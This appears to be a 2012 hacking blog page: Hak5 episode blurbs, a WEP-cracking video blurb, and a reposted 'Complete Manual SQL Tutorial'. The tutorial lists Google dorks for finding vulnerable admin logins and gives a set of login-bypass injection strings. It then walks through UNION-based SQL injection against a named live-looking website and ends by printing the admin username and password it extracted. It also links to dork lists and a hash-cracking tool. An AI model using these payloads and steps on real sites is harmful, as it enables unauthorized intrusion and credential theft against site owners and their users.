This time on the show, hacking Android with the USB Rubber Ducky. Darren revisits the original Human Interface Device Attack tool and shows off the 4th generation hardware. Plus, improve your Ubuntu boxes performance with a few simple tips - Shannon reports. All that and more, this time on Hak5!
source : http://www.youtube.com/watch?v=YjTIjn4TlmE&feature=g-all-u
or : http://hak5.org/
Wednesday, November 28, 2012
Hak5 1215.1 Run Windows apps in Linux the easy way, Netflix unofficially on Linux, and Chocolate!
This time on the show, Netflix comes to Linux! Sort of. We'll explain how and what this might mean for the industry. Then, playing games and other Windows apps in Linux with WINE, which, isn't an emulator. But it is. Sorta. Plus, our favorite Linux commands. One of 'em involves chocolate! Stay tuned! All that and more this time on Hak5!
backtrack 5 R3 - Automatically Cracking WEP Networks
This video is to show beginners how they can automatically crack a WEP Wireless network using autocrack which is a Open Source Project.
Please remember that in some countrys and states trying to preform an attack on a network you don't have authorization to preform attacks on is consider illegal please only use this on your own networks.
Tuesday, November 27, 2012
Complete Manual SQL Tutorial
Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.
Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .
PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"the site should look something like this :
ADMIN USERNAME :
PASSWORD :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin
If the site is vulnerable than you are in :D
PART 2
Finding Sites to Inject
Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.
Download SQLI dorks list from here : http://www.mediafire.com/?y7v30lcj0kn8836
http://adf.ly/cjpJ <--- password is somewhere in it
PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this :
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10
To check that it is vulnerable all you have to do is add a '
So our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'Press enter and you get some kind of error. The errors will vary...
Our page should look like that : (Click to View)
Our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--If you get an error that means you should lower the number of columns .
Let's try 10.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--The page opened normally that means the number of columns is between 10 and 14.
We try now 11.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--The page opened normally too...
Let's try 12.
Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .
Finding Accessible Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--We should get numbers .
Our page should look like that : (Click to View)
For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.
Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--
The page should look like that : (Click to View)
In our case we got "5.0.77" its >5 so we can continue.
Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--
Page should look like that : (Click to View)
Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin
Spoiler (Click to View)
Now we need to get the ASCII value of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html
Spoiler (Click to View)
Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :
Code:
tbladminIt should be like that:
Code:
116,98,108,97,100,109,105,110
Spoiler (Click to View)
Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--Our page should be like that:
Spoiler (Click to View)
Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like that:
Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladminOur page should look like that :
Spoiler (Click to View)
And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.
http://www.mediafire.com/?7qd7t6r3b13ccq4
http://adf.ly/cjpJ<---- the password is in it somewhere :)
And We're Done !
I hope you liked my tutorial .
ALL credits go to me !
Thanks for reading that thread.
source : http://www.hackitcafe.com/2011/06/complete-manual-sqli-tutorial.html
Or : http://websec.ca/kb/sql_injection
Subscribe to:
Posts (Atom)